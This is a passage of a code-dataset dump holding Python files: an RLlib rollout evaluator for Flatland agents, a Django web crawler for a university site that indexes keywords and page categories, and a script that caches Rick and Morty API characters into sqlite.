cluster.id)\n\n\t\t\tpbar.update(i)\n\t\npbar.finish()\n","repo_name":"nickstiffler/Mu-Illumina","sub_path":"scripts/load_clusters.py","file_name":"load_clusters.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19482092938","text":"#!/usr/bin/env python\n\nimport argparse\nimport collections\nimport json\nimport logging\nimport os\nimport pickle\nimport shelve\nfrom pathlib import Path\n\nimport gym\nimport numpy as np\nimport ray\nfrom ray.rllib.agents.registry import get_agent_class\nfrom ray.rllib.env import MultiAgentEnv\nfrom ray.rllib.env.base_env import _DUMMY_AGENT_ID\nfrom ray.rllib.evaluation.episode import _flatten_action\nfrom ray.rllib.policy.sample_batch import DEFAULT_POLICY_ID\n#from 
ray.rllib.utils.space_utils import flatten_to_single_ndarray\nfrom ray.tune.utils import merge_dicts\n\nfrom utils.loader import load_envs, load_models\n\nlogger = logging.getLogger(__name__)\n\nEXAMPLE_USAGE = \"\"\"\nExample Usage:\n python rollout.py /Users/flaurent/Sites/flatland/flatland-checkpoints/checkpoint_940/checkpoint-940 --run APEX --no-render --episodes 1000 --env 'flatland_random_sparse_small' --config '{\"env_config\": {\"test\": \"true\", \"min_seed\": 1002, \"max_seed\": 213783, \"min_test_seed\": 0, \"max_test_seed\": 100, \"reset_env_freq\": \"1\", \"regenerate_rail_on_reset\": \"True\", \"regenerate_schedule_on_reset\": \"True\", \"observation\": \"tree\", \"observation_config\": {\"max_depth\": 2, \"shortest_path_max_depth\": 30}}, \"model\": {\"fcnet_activation\": \"relu\", \"fcnet_hiddens\": [256, 256], \"vf_share_layers\": \"True\"}}' \n\"\"\"\n\n\"\"\"\n# Testing in flatland_random_sparse_small:\npython rollout.py /Users/flaurent/Sites/flatland/flatland-checkpoints/checkpoint_940/checkpoint-940 --run APEX --no-render --episodes 1000 --env 'flatland_random_sparse_small' --config '{\"env_config\": {\"test\": \"true\", \"min_seed\": 1002, \"max_seed\": 213783, \"min_test_seed\": 0, \"max_test_seed\": 100, \"reset_env_freq\": \"1\", \"regenerate_rail_on_reset\": \"True\", \"regenerate_schedule_on_reset\": \"True\", \"observation\": \"tree\", \"observation_config\": {\"max_depth\": 2, \"shortest_path_max_depth\": 30}}, \"model\": {\"fcnet_activation\": \"relu\", \"fcnet_hiddens\": [256, 256], \"vf_share_layers\": \"True\"}}' \n\n# Testing in flatland_sparse:\npython rollout.py /Users/flaurent/Sites/flatland/flatland-checkpoints/checkpoint_940/checkpoint-940 --run APEX --no-render --episodes 1000 --env 'flatland_sparse' --config '{\"env_config\": {\"test\": \"true\", \"generator\": \"sparse_rail_generator\", \"generator_config\": \"small_v0\", \"observation\": \"tree\", \"observation_config\": {\"max_depth\": 2, \"shortest_path_max_depth\": 30}}, \"model\": {\"fcnet_activation\": \"relu\", \"fcnet_hiddens\": [256, 256], \"vf_share_layers\": \"True\"}}' \n\"\"\"\n\n# Register all necessary assets in tune registries\nload_envs(os.getcwd()) # Load envs\nload_models(os.getcwd()) # Load models\n\n\nclass RolloutSaver:\n \"\"\"Utility class for storing rollouts.\n\n Currently supports two behaviours: the original, which\n simply dumps everything to a pickle file once complete,\n and a mode which stores each rollout as an entry in a Python\n shelf db file. The latter mode is more robust to memory problems\n or crashes part-way through the rollout generation. 
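Each finished episode is written to the shelf by end_rollout() as it\n completes, so partial results can survive a crash. 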
Each rollout\n is stored with a key based on the episode number (0-indexed),\n and the number of episodes is stored with the key \"num_episodes\",\n so to load the shelf file, use something like:\n\n with shelve.open('rollouts.pkl') as rollouts:\n for episode_index in range(rollouts[\"num_episodes\"]):\n rollout = rollouts[str(episode_index)]\n\n If outfile is None, this class does nothing.\n \"\"\"\n\n def __init__(self,\n outfile=None,\n use_shelve=False,\n write_update_file=False,\n target_steps=None,\n target_episodes=None,\n save_info=False):\n self._outfile = outfile\n self._update_file = None\n self._use_shelve = use_shelve\n self._write_update_file = write_update_file\n self._shelf = None\n self._num_episodes = 0\n self._rollouts = []\n self._current_rollout = []\n self._total_steps = 0\n self._target_episodes = target_episodes\n self._target_steps = target_steps\n self._save_info = save_info\n\n def _get_tmp_progress_filename(self):\n outpath = Path(self._outfile)\n return outpath.parent / (\"__progress_\" + outpath.name)\n\n @property\n def outfile(self):\n return self._outfile\n\n def __enter__(self):\n if self._outfile:\n if self._use_shelve:\n # Open a shelf file to store each rollout as they come in\n self._shelf = shelve.open(self._outfile)\n else:\n # Original behaviour - keep all rollouts in memory and save\n # them all at the end.\n # But check we can actually write to the outfile before going\n # through the effort of generating the rollouts:\n try:\n with open(self._outfile, \"wb\") as _:\n pass\n except IOError as x:\n print(\"Can not open {} for writing - cancelling rollouts.\".\n format(self._outfile))\n raise x\n if self._write_update_file:\n # Open a file to track rollout progress:\n self._update_file = self._get_tmp_progress_filename().open(\n mode=\"w\")\n return self\n\n def __exit__(self, type, value, traceback):\n if self._shelf:\n # Close the shelf file, and store the number of episodes for ease\n self._shelf[\"num_episodes\"] = self._num_episodes\n self._shelf.close()\n elif self._outfile and not self._use_shelve:\n # Dump everything as one big pickle:\n pickle.dump(self._rollouts, open(self._outfile, \"wb\"))\n if self._update_file:\n # Remove the temp progress file:\n self._get_tmp_progress_filename().unlink()\n self._update_file = None\n\n def _get_progress(self):\n if self._target_episodes:\n return \"{} / {} episodes completed\".format(self._num_episodes,\n self._target_episodes)\n elif self._target_steps:\n return \"{} / {} steps completed\".format(self._total_steps,\n self._target_steps)\n else:\n return \"{} episodes completed\".format(self._num_episodes)\n\n def begin_rollout(self):\n self._current_rollout = []\n\n def end_rollout(self):\n if self._outfile:\n if self._use_shelve:\n # Save this episode as a new entry in the shelf database,\n # using the episode number as the key.\n self._shelf[str(self._num_episodes)] = self._current_rollout\n else:\n # Append this rollout to our list, to save laer.\n self._rollouts.append(self._current_rollout)\n self._num_episodes += 1\n if self._update_file:\n self._update_file.seek(0)\n self._update_file.write(self._get_progress() + \"\\n\")\n self._update_file.flush()\n\n def append_step(self, obs, action, next_obs, reward, done, info):\n \"\"\"Add a step to the current rollout, if we are saving them\"\"\"\n if self._outfile:\n if self._save_info:\n self._current_rollout.append(\n [obs, action, next_obs, reward, done, info])\n else:\n self._current_rollout.append(\n [obs, action, next_obs, reward, done])\n 
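# Note: the step total is counted even when no outfile is set, so that\n # _get_progress() can report progress against a --steps target.\n 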
self._total_steps += 1\n\n\ndef create_parser(parser_creator=None):\n parser_creator = parser_creator or argparse.ArgumentParser\n parser = parser_creator(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"Roll out a reinforcement learning agent \"\n \"given a checkpoint.\",\n epilog=EXAMPLE_USAGE)\n\n parser.add_argument(\n \"checkpoint\", type=str, help=\"Checkpoint from which to roll out.\")\n required_named = parser.add_argument_group(\"required named arguments\")\n required_named.add_argument(\n \"--run\",\n type=str,\n required=True,\n help=\"The algorithm or model to train. This may refer to the name \"\n \"of a built-on algorithm (e.g. RLLib's DQN or PPO), or a \"\n \"user-defined trainable function or class registered in the \"\n \"tune registry.\")\n required_named.add_argument(\n \"--env\", type=str, help=\"The gym environment to use.\")\n parser.add_argument(\n \"--no-render\",\n default=False,\n action=\"store_const\",\n const=True,\n help=\"Surpress rendering of the environment.\")\n parser.add_argument(\n \"--monitor\",\n default=False,\n action=\"store_const\",\n const=True,\n help=\"Wrap environment in gym Monitor to record video.\")\n parser.add_argument(\n \"--steps\", default=10000, help=\"Number of steps to roll out.\")\n parser.add_argument(\"--out\", default=None, help=\"Output filename.\")\n parser.add_argument(\n \"--config\",\n default=\"{}\",\n type=json.loads,\n help=\"Algorithm-specific configuration (e.g. env, hyperparams). \"\n \"Surpresses loading of configuration from checkpoint.\")\n parser.add_argument(\n \"--episodes\",\n default=0,\n help=\"Number of complete episodes to roll out. (Overrides --steps)\")\n parser.add_argument(\n \"--save-info\",\n default=False,\n action=\"store_true\",\n help=\"Save the info field generated by the step() method, \"\n \"as well as the action, observations, rewards and done fields.\")\n parser.add_argument(\n \"--use-shelve\",\n default=False,\n action=\"store_true\",\n help=\"Save rollouts into a python shelf file (will save each episode \"\n \"as it is generated). An output filename must be set using --out.\")\n parser.add_argument(\n \"--track-progress\",\n default=False,\n action=\"store_true\",\n help=\"Write progress to a temporary file (updated \"\n \"after each episode). 
An output filename must be set using --out; \"\n \"the progress file will live in the same folder.\")\n return parser\n\n\ndef run(args, parser):\n config = {}\n # Load configuration from file\n config_dir = os.path.dirname(args.checkpoint)\n config_path = os.path.join(config_dir, \"params.pkl\")\n if not os.path.exists(config_path):\n config_path = os.path.join(config_dir, \"../params.pkl\")\n if not os.path.exists(config_path):\n if not args.config:\n raise ValueError(\n \"Could not find params.pkl in either the checkpoint dir or \"\n \"its parent directory.\")\n else:\n with open(config_path, \"rb\") as f:\n config = pickle.load(f)\n if \"num_workers\" in config:\n config[\"num_workers\"] = min(2, config[\"num_workers\"])\n config = merge_dicts(config, args.config)\n if not args.env:\n if not config.get(\"env\"):\n parser.error(\"the following arguments are required: --env\")\n args.env = config.get(\"env\")\n\n ray.init()\n\n cls = get_agent_class(args.run)\n agent = cls(env=args.env, config=config)\n agent.restore(args.checkpoint)\n num_steps = int(args.steps)\n num_episodes = int(args.episodes)\n with RolloutSaver(\n args.out,\n args.use_shelve,\n write_update_file=args.track_progress,\n target_steps=num_steps,\n target_episodes=num_episodes,\n save_info=args.save_info) as saver:\n outcome = rollout(agent, args.env, num_steps, num_episodes, saver,\n args.no_render, args.monitor)\n outcome_file = os.path.join(os.path.dirname(config_path), 'test_outcome.json')\n with open(outcome_file, 'w') as f:\n json.dump(outcome, f, indent=4)\n\n\nclass DefaultMapping(collections.defaultdict):\n \"\"\"default_factory now takes as an argument the missing key.\"\"\"\n\n def __missing__(self, key):\n self[key] = value = self.default_factory(key)\n return value\n\n\ndef default_policy_agent_mapping(unused_agent_id):\n return DEFAULT_POLICY_ID\n\n\ndef keep_going(steps, num_steps, episodes, num_episodes):\n \"\"\"Determine whether we've collected enough data\"\"\"\n # if num_episodes is set, this overrides num_steps\n if num_episodes:\n return episodes < num_episodes\n # if num_steps is set, continue until we reach the limit\n if num_steps:\n return steps < num_steps\n # otherwise keep going forever\n return True\n\n\ndef rollout(agent,\n env_name,\n num_steps,\n num_episodes=0,\n saver=None,\n no_render=True,\n monitor=False):\n policy_agent_mapping = default_policy_agent_mapping\n\n if saver is None:\n saver = RolloutSaver()\n\n if hasattr(agent, \"workers\"):\n env = agent.workers.local_worker().env\n multiagent = isinstance(env, MultiAgentEnv)\n if agent.workers.local_worker().multiagent:\n policy_agent_mapping = agent.config[\"multiagent\"][\n \"policy_mapping_fn\"]\n\n policy_map = agent.workers.local_worker().policy_map\n state_init = {p: m.get_initial_state() for p, m in policy_map.items()}\n use_lstm = {p: len(s) > 0 for p, s in state_init.items()}\n action_init = {\n #p: flatten_to_single_ndarray(m.action_space.sample()) # ray 0.8.5\n p: _flatten_action(m.action_space.sample()) # ray 0.8.4\n for p, m in policy_map.items()\n }\n else:\n env = gym.make(env_name)\n multiagent = False\n use_lstm = {DEFAULT_POLICY_ID: False}\n\n if monitor and not no_render and saver and saver.outfile is not None:\n # If monitoring has been requested,\n # manually wrap our environment with a gym monitor\n # which is set to record every episode.\n env = gym.wrappers.Monitor(\n env, os.path.join(os.path.dirname(saver.outfile), \"monitor\"),\n lambda x: True)\n\n steps = 0\n episodes = 0\n simulation_rewards = []\n 
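# Note: the normalized score below is episode_score divided by\n # (episode_max_steps + episode_num_agents), as computed in the loop.\n 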
simulation_rewards_normalized = []\n simulation_percentage_complete = []\n simulation_steps = []\n\n while keep_going(steps, num_steps, episodes, num_episodes):\n mapping_cache = {} # in case policy_agent_mapping is stochastic\n saver.begin_rollout()\n obs = env.reset()\n agent_states = DefaultMapping(\n lambda agent_id: state_init[mapping_cache[agent_id]])\n prev_actions = DefaultMapping(\n lambda agent_id: action_init[mapping_cache[agent_id]])\n prev_rewards = collections.defaultdict(lambda: 0.)\n done = False\n reward_total = 0.0\n\n episode_steps = 0\n episode_max_steps = 0\n episode_num_agents = 0\n agents_score = collections.defaultdict(lambda: 0.)\n agents_done = set()\n\n while not done and keep_going(steps, num_steps, episodes,\n num_episodes):\n multi_obs = obs if multiagent else {_DUMMY_AGENT_ID: obs}\n action_dict = {}\n for agent_id, a_obs in multi_obs.items():\n if a_obs is not None:\n policy_id = mapping_cache.setdefault(\n agent_id, policy_agent_mapping(agent_id))\n p_use_lstm = use_lstm[policy_id]\n if p_use_lstm:\n a_action, p_state, _ = agent.compute_action(\n a_obs,\n state=agent_states[agent_id],\n prev_action=prev_actions[agent_id],\n prev_reward=prev_rewards[agent_id],\n policy_id=policy_id)\n agent_states[agent_id] = p_state\n else:\n a_action = agent.compute_action(\n a_obs,\n prev_action=prev_actions[agent_id],\n prev_reward=prev_rewards[agent_id],\n policy_id=policy_id)\n #a_action = flatten_to_single_ndarray(a_action) # ray 0.8.5\n a_action = _flatten_action(a_action) # tuple actions # ray 0.8.4\n action_dict[agent_id] = a_action\n prev_actions[agent_id] = a_action\n action = action_dict\n\n action = action if multiagent else action[_DUMMY_AGENT_ID]\n next_obs, reward, done, info = env.step(action)\n if multiagent:\n for agent_id, r in reward.items():\n prev_rewards[agent_id] = r\n else:\n prev_rewards[_DUMMY_AGENT_ID] = reward\n\n if multiagent:\n done = done[\"__all__\"]\n reward_total += sum(reward.values())\n else:\n reward_total += reward\n if not no_render:\n env.render()\n saver.append_step(obs, action, next_obs, reward, done, info)\n steps += 1\n obs = next_obs\n\n for agent_id, agent_info in info.items():\n if episode_max_steps == 0:\n episode_max_steps = agent_info[\"max_episode_steps\"]\n episode_num_agents = agent_info[\"num_agents\"]\n episode_steps = max(episode_steps, agent_info[\"agent_step\"])\n agents_score[agent_id] = agent_info[\"agent_score\"]\n if agent_info[\"agent_done\"]:\n agents_done.add(agent_id)\n\n episode_score = sum(agents_score.values())\n simulation_rewards.append(episode_score)\n simulation_rewards_normalized.append(episode_score / (episode_max_steps + episode_num_agents))\n simulation_percentage_complete.append(float(len(agents_done)) / episode_num_agents)\n simulation_steps.append(episode_steps)\n\n saver.end_rollout()\n print(f\"Episode #{episodes}: \"\n f\"score: {episode_score:.2f} \"\n f\"({np.mean(simulation_rewards):.2f}), \"\n f\"normalized score: {simulation_rewards_normalized[-1]:.2f} \"\n f\"({np.mean(simulation_rewards_normalized):.2f}), \"\n f\"percentage_complete: {simulation_percentage_complete[-1]:.2f} \"\n f\"({np.mean(simulation_percentage_complete):.2f})\")\n if done:\n episodes += 1\n\n print(\"Evaluation completed:\\n\"\n f\"Episodes: {episodes}\\n\"\n f\"Mean Reward: {np.round(np.mean(simulation_rewards))}\\n\"\n f\"Mean Normalized Reward: {np.round(np.mean(simulation_rewards_normalized))}\\n\"\n f\"Mean Percentage Complete: {np.round(np.mean(simulation_percentage_complete), 3)}\\n\"\n f\"Mean Steps: 
{np.round(np.mean(simulation_steps), 2)}\")\n\n return {\n 'reward': [float(r) for r in simulation_rewards],\n 'reward_mean': np.mean(simulation_rewards),\n 'reward_std': np.std(simulation_rewards),\n 'normalized_reward': [float(r) for r in simulation_rewards_normalized],\n 'normalized_reward_mean': np.mean(simulation_rewards_normalized),\n 'normalized_reward_std': np.std(simulation_rewards_normalized),\n 'percentage_complete': [float(c) for c in simulation_percentage_complete],\n 'percentage_complete_mean': np.mean(simulation_percentage_complete),\n 'percentage_complete_std': np.std(simulation_percentage_complete),\n 'steps': [float(c) for c in simulation_steps],\n 'steps_mean': np.mean(simulation_steps),\n 'steps_std': np.std(simulation_steps),\n }\n\n\nif __name__ == \"__main__\":\n parser = create_parser()\n args = parser.parse_args()\n run(args, parser)\n","repo_name":"AIcrowd/neurips2020-flatland-baselines","sub_path":"rollout.py","file_name":"rollout.py","file_ext":"py","file_size_in_byte":19666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"19170171300","text":"import requests\nfrom bs4 import BeautifulSoup, Comment\nimport re\nimport datetime\nfrom urllib.parse import urljoin\nfrom core.models import Keywords, Urls, Favicons, UrlCategory, RootDomain\nfrom random import shuffle\nimport joblib\n\ndef scrap(url: str):\n if isUrlAllowed(url) == False:\n return (None, None, None, None, None, None)\n try:\n page = requests.get(url, timeout = 10)\n except:\n return (None, None, None, None, None, None)\n if page.status_code != 200:\n print(\"Error: \", page.status_code)\n return (None, None, None, None, None, None)\n docParser = ''\n if url[-4:] == '.pdf' or url[-4:] == '.doc' or url[-5:] == '.docx' or url[-4:] == '.ppt' or url[-5:] == '.pptx' or url[-4:] == '.xls' or url[-5:] == '.xlsx':\n docParser = 'lxml'\n content = page.content\n else:\n docParser = 'html.parser'\n content = page.text\n\n soup = BeautifulSoup(content, docParser)\n \n # using Set data structure to store all urls on this page and avoid duplication\n urls_found_on_this_page = set()\n for link in soup.find_all('a', href = True):\n found_url = str(link.get('href'))\n if len(found_url) > 0:\n if found_url[0] == \"/\":\n found_url = urljoin(url,found_url)\n if found_url != url and re.match(url_regex, found_url) is not None:\n urls_found_on_this_page.add(found_url)\n \n urls_found_on_this_page = list(urls_found_on_this_page)\n\n keywords = []\n \n if soup.find_all('meta', attrs={'name':'description'}):\n scrapped_desc = soup.find('meta', attrs={'name':'description'}).get(\"content\")\n keywords.append(scrapped_desc)\n page_description = soup.find('meta', attrs={'name':'description'}).get(\"content\")\n else:\n page_description = None\n\n # add headings to keywords\n headings = soup.find_all(['h1', 'h2', 'h3', 'h4', 'h5', 'h6'])\n for heading in headings:\n keywords.append(str(heading.text).strip())\n if page_description == None:\n if headings:\n page_description = headings[0].text.strip()\n else:\n page_description = text_from_html(content)[:pageDescriptionCharLimit]\n\n # add title to keywords and save page title\n page_title = None\n titles = soup.find_all('title')\n for title in titles:\n keywords.append(str(title.text).strip())\n\n if len(titles) == 0:\n page_title = text_from_html(content)[:pageTitleCharLimit]\n else:\n page_title = titles[0].text.strip()\n\n iconLink = getFavicon(url, soup)\n\n # categorize url based on its content\n urlCategory = 
joblib.load('core/static/core/website_category_detection_model.joblib').predict([text_from_html(content[:2500])])[0]\n\n return (keywords, page_title, page_description, iconLink, urls_found_on_this_page, urlCategory)\n\n\n\ndef store(url, keywords, urls_found_on_this_page, title, description, iconLink, urlCategory):\n # saving current url to db if not already saved, and getting its reference, later mapping it with keywords and updating its last_scrapped value\n url_row, created_url_obj = Urls.objects.get_or_create(address = url)\n #delete keywords feild entry as some keywords may no longer be in page so start afresh\n url_row.keywords_in_it.clear()\n # update or create title, description, iconLink and category\n url_row.page_title = title[:pageTitleCharLimit]\n url_row.page_description = description[:pageDescriptionCharLimit]\n favicon_row = Favicons.objects.get_or_create(icon_link = iconLink)\n url_row.icon_link = str(favicon_row[0].id)\n url_row.category = UrlCategory.objects.get_or_create(category_name = urlCategory)[0].id\n # save keywords to database model Keywords and relate it with current url by many-to-many relationship\n for keyword in keywords:\n keyword = keyword.strip()\n if keyword:\n keyword_row, created_keyword_obj = Keywords.objects.get_or_create(keyword_string = keyword)\n url_row.keywords_in_it.add(keyword_row) # Adding a second time is OK, it will not duplicate the relation\n\n # create entries for all links found in page, and increment their num_of_refs if this url is not earlier scrapped\n # i.e increment iff current url is not yet scrapped and link is already present in db (as default is 1)\n # not yet scrapped can be determined by last_scrapped being datetime.datetime.min\n for link in urls_found_on_this_page:\n if isUrlAllowed(link):\n link_row, created_link_obj = Urls.objects.get_or_create(address = link)\n if (not created_link_obj) and url_row.last_scrapped == datetime.datetime.min:\n link_row.num_of_refs += 1\n link_row.save()\n \n url_row.last_scrapped = datetime.datetime.utcnow()\n url_row.save()\n\ndef getFavicon(url, soup):\n icon_link = soup.find(\"link\", rel=\"shortcut icon\")\n if icon_link is None:\n icon_link = soup.find(\"link\", rel=\"icon\")\n if icon_link is None:\n return getBaseUrl(url) + '/favicon.ico'\n if not icon_link[\"href\"].startswith(\"http\"):\n return urljoin(getBaseUrl(url),icon_link[\"href\"])\n return icon_link[\"href\"]\n\ndef getBaseUrl(url):\n return re.match(r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', url, re.IGNORECASE).group(0)\n\ndef get_url_regex():\n # regex for checking if valid url\n #source: https://stackoverflow.com/a/7160778/12312757\n return re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' 
# optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\ndef tag_visible(element):\n if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:\n return False\n if isinstance(element, Comment):\n return False\n return True\n\n\ndef text_from_html(body):\n soup = BeautifulSoup(body, 'html.parser')\n texts = soup.findAll(text=True)\n visible_texts = filter(tag_visible, texts) \n return u\" \".join(t.strip() for t in visible_texts)\n\ndef getUrlsFromSitemap(sitemapUrl):\n urls = []\n sitemap = requests.get(sitemapUrl)\n if sitemap.status_code == 200:\n soup = BeautifulSoup(sitemap.content, 'xml')\n for url in soup.find_all('url'):\n urls.append(url.find('loc').text)\n return urls\n\ndef isUrlAllowed(url):\n allowed_domains = [rootDomain, \"https://isc.charusat.ac.in\", \"https://charusat.edu.in:912/\"]\n url = url.strip().lower()\n if url[-4:] == '.pdf' or url[-4:] == '.doc' or url[-5:] == '.docx' or url[-4:] == '.ppt' or url[-5:] == '.pptx' or url[-4:] == '.xls' or url[-5:] == '.xlsx':\n return False # return None if url is a document as currently we are not supporting documents\n if url[-4:] == '.jpg' or url[-4:] == '.png' or url[-4:] == '.gif' or url[-4:] == '.svg' or url[-4:] == '.bmp' or url[-4:] == '.ico':\n return False\n if url[-4:] == '.mp3' or url[-4:] == '.mp4' or url[-4:] == '.wav' or url[-4:] == '.avi' or url[-4:] == '.flv' or url[-4:] == '.wmv':\n return False\n if url[-4:] == '.zip' or url[-4:] == '.rar' or url[-4:] == '.7z' or url[-4:] == '.tar' or url[-4:] == '.gz' or url[-4:] == '.bz2':\n return False\n if url[-4:] == '.exe' or url[-4:] == '.msi' or url[-4:] == '.apk' or url[-4:] == '.dmg' or url[-4:] == '.deb' or url[-4:] == '.rpm':\n return False\n if url[-4:] == '.ttf' or url[-4:] == '.otf' or url[-4:] == '.woff' or url[-4:] == '.woff2' or url[-4:] == '.eot':\n return False\n if url[-4:] == '.css' or url[-3:] == '.js':\n return False\n if url[-4:] == '.xml' or url[-4:] == '.rss':\n return False\n if url[-4:] == '.csv' or url[-4:] == '.txt' or url[-4:] == '.log':\n return False\n \n if domainRestricted:\n flag = False\n for domain in allowed_domains:\n if url.find(domain) == 0:\n flag = True\n return flag\n \n return True\n\n\nif __name__ == \"django.core.management.commands.shell\":\n url_regex = get_url_regex()\n pageTitleCharLimit = 60\n pageDescriptionCharLimit = 140\n maxUrlsToScrapInSession = 10\n urlsScrappedInSession = 0\n scrapIntervalInDays = 3\n manualAddition = True\n domainRestricted = True\n parseSitemap = True\n rootDomain = \"https://charusat.ac.in/\"\n rootTitle = \"Charotar University of Science and Technology\"\n sitemapUrl = \"https://charusat.ac.in/sitemap.xml\"\n\n if domainRestricted:\n RootDomain.objects.all().delete()\n record, created_now = RootDomain.objects.get_or_create(root_url = rootDomain)\n record.root_title = rootTitle\n record.save()\n\n print(\"[ + ] Initializing crawler!\")\n print(\"[ + ] Scraping {0} urls in this session which are not scrapped in the last {1} days.\".format(maxUrlsToScrapInSession, scrapIntervalInDays))\n print(\"-------------------------------------------\\n\")\n\n if domainRestricted and parseSitemap:\n print(\"[ + ] Parsing sitemap for urls in domain '{0}'\".format(rootDomain))\n urlsInSitemap = getUrlsFromSitemap(sitemapUrl)\n print(\"[ + ] Found {0} urls in sitemap.\".format(len(urlsInSitemap)))\n urlsAddedFromSitemap = 0\n for url in urlsInSitemap:\n if isUrlAllowed(url):\n link_row, created_link_obj = Urls.objects.get_or_create(address = url)\n if created_link_obj:\n 
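# Sitemap-discovered URLs start at zero references; the model default\n # of 1 appears to be reserved for URLs found as links while crawling.\n 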
link_row.num_of_refs = 0\n link_row.save()\n urlsAddedFromSitemap += 1\n print(\"[ + ] Added {0} urls to database from sitemap.\".format(urlsAddedFromSitemap))\n\n if manualAddition:\n url_to_scrap = \"https://charusat.ac.in/\"\n keywords_found_on_this_page, page_title, page_description, iconLink, urls_found_on_this_page, category = scrap(url_to_scrap)\n if (keywords_found_on_this_page, urls_found_on_this_page) == (None, None):\n print(\"[ - ] The manual addition URL '{0}' cannot be scrapped.\".format(url_to_scrap))\n else:\n store(url_to_scrap, keywords_found_on_this_page, urls_found_on_this_page, page_title, page_description, iconLink, category)\n urlsScrappedInSession += 1\n print(\"[ + ] Crawled ({0}/{1}) URL: {2}\".format(urlsScrappedInSession,maxUrlsToScrapInSession,url_to_scrap))\n\n while urlsScrappedInSession < maxUrlsToScrapInSession:\n to_scrap_urls = list(Urls.objects.filter(last_scrapped__lt = (datetime.datetime.utcnow() - datetime.timedelta(days = scrapIntervalInDays))))\n if len(to_scrap_urls) == 0:\n print(\"[ - ] No URLs to scrap currenty. Try changing scrap conditions or manually add new URLs.\")\n break\n shuffle(to_scrap_urls) # shuffling to ge more diversified results\n for i in range(len(to_scrap_urls)):\n url_object = to_scrap_urls[i]\n if urlsScrappedInSession >= maxUrlsToScrapInSession:\n break\n url_to_scrap = url_object.address\n keywords_found_on_this_page, page_title, page_description, iconLink, urls_found_on_this_page, category = scrap(url_to_scrap)\n if (keywords_found_on_this_page, urls_found_on_this_page) == (None, None):\n print(\"[ - ] Skipping URL: {0}\".format(url_to_scrap))\n continue\n store(url_to_scrap, keywords_found_on_this_page, urls_found_on_this_page, page_title, page_description, iconLink, category)\n urlsScrappedInSession += 1\n print(\"[ + ] Crawled ({0}/{1}) URL: {2}\".format(urlsScrappedInSession,maxUrlsToScrapInSession,url_to_scrap))\n\n print(\"\\n-------------------------------------------\")\n print(\"[ + ] Total Keywords string in Database: \", Keywords.objects.count())\n print(\"[ + ] Total URLs present in Database: \",Urls.objects.count())\n print(\"[ + ] Total URLs crawled: \",Urls.objects.exclude(last_scrapped = datetime.datetime.min).count())","repo_name":"coderGtm/Talaash","sub_path":"core/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":12355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"71436278009","text":"# from urllib.request import Request, urlopen\nimport sqlite3\nimport json\nimport time\nimport os\nimport urllib.request\n\n# rickandmorty_apitodict() this only needs to be called once.\n# the resulting file should be uploaded to github as a static file which we can pull from\n\n# create a csv file and a function to read from the api and write to the csv file.\n# use the above function to read from said file and create the database instead of directly requesting from the API\n# this speeds things up instead of taking 20-30 seconds every time\n\ndef get_and_store_RandMcharacters():\n \"\"\"\n Gets information on every character from Rick and Morty.\n The data is stored in the \"data\" directory as a JSON file.\n The JSON file is an array of array. 
    Each object has the following fields:\n        name: name of the character\n        image_link: link to the character's image\n    \"\"\"\n    count = 493 # this is the total number of characters in rick and morty\n    page = 1\n    data = {}\n    data['characters'] = []\n    while count > 0:\n        request = urllib.request.urlopen(\"https://rickandmortyapi.com/api/character/?page=\" + str(page))\n        response = request.read()\n        result = json.loads(response)\n        # Use a for loop to add every element to the database\n        for i in result['results']:\n            data['characters'].append({\n                'name' : i['name'],\n                'image_link' : i['image']\n            })\n            count -= 1\n        page += 1\n    with open('data/rickandmortydata.json', 'w') as outfile:\n        json.dump(data, outfile)\n    print(\"Got character info and cached into data/rickandmortydata.json\")\n\ndef enter_database():\n    \"\"\"\n    Gets the Rick and Morty characters and stores them in the database.\n    The first time this function is called, the API data received will be cached in the \"data\" directory. Subsequent\n    calls to this function will use the cached data instead.\n\n    Make sure the database has been created before this is called.\n    \"\"\"\n    database = sqlite3.connect(\"data/database.db\")\n    c = database.cursor()\n\n    # rick and morty data\n    if not os.path.exists(\"data/rickandmortydata.json\"):\n        get_and_store_RandMcharacters()\n    with open('data/rickandmortydata.json') as json_file: # change this to not use the database_query function\n        data = json.load(json_file)\n    for i in data['characters']:\n        c.execute(\"INSERT INTO rickandmorty(full_name, image_link) VALUES (?, ?)\", (i['name'], i['image_link']))\n\n    database.commit()\n    database.close()\n\n\ndef initialize():\n    enter_database()\n","repo_name":"aolteanu00/Online-Casino","sub_path":"data/rick_and_morty.py","file_name":"rick_and_morty.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
